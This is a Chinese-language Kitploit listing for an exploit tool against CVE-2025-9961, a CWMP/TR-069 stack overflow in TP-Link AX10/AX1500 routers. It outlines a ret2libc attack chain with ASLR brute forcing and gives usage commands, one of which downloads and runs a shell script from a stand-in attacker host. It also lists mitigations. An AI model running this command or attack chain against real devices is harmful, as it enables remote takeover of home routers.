Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-9961 — 针对TP-Link AX10/AX1500在CWMP (TR-069)中的栈缓冲区溢出漏洞的利用,通过ret2libc绕过ASLR实现远程代码执行。包含仅检测、DoS和命令执行模式。 | Kitploit
工具/GitHubGitHub/yt2w/cve-2025-9961
嵌入式系统安全物联网安全漏洞分析漏洞利用渗透测试硬件安全远程访问工具二进制利用
GitHubyt2w/cve-2025-9961

CVE-2025-9961

针对TP-Link AX10/AX1500在CWMP (TR-069)中的栈缓冲区溢出漏洞的利用,通过ret2libc绕过ASLR实现远程代码执行。包含仅检测、DoS和命令执行模式。

查看仓库
6138个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-9961

TP-Link AX10/AX1500 CWMP 缓冲区溢出远程代码执行

概述

CWMP(TR-069)中的栈缓冲区溢出导致远程代码执行。

字段值
产品TP-Link AX10, AX1500
受影响版本AX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6(高危)
类型栈缓冲区溢出
向量CWMP/TR-069(端口 7547)
影响远程代码执行

攻击流程

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

技术细节

漏洞存在于 cwmp 进程处理 SetParameterValues SOAP 请求的过程中。输入数据在计算缓冲区大小时未经边界检查。

利用方式:

  • 使用 ret2libc 调用 system()
  • 通过暴力破解绕过 ASLR
  • 服务重启允许重复尝试

用法

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

参数

依赖项

无(使用标准库)

缓解措施

  • 更新至已修复固件
  • 禁用 TR-069/CWMP
  • 限制端口 7547 的访问

免责声明

仅供授权安全测试使用。

下载工具
标志描述默认值
-p, --portCWMP 端口7547
-c, --commandRCE 执行的命令none
-t, --timeout套接字超时10
--dos仅 DoS 模式off
--check-only仅检测是否易受攻击off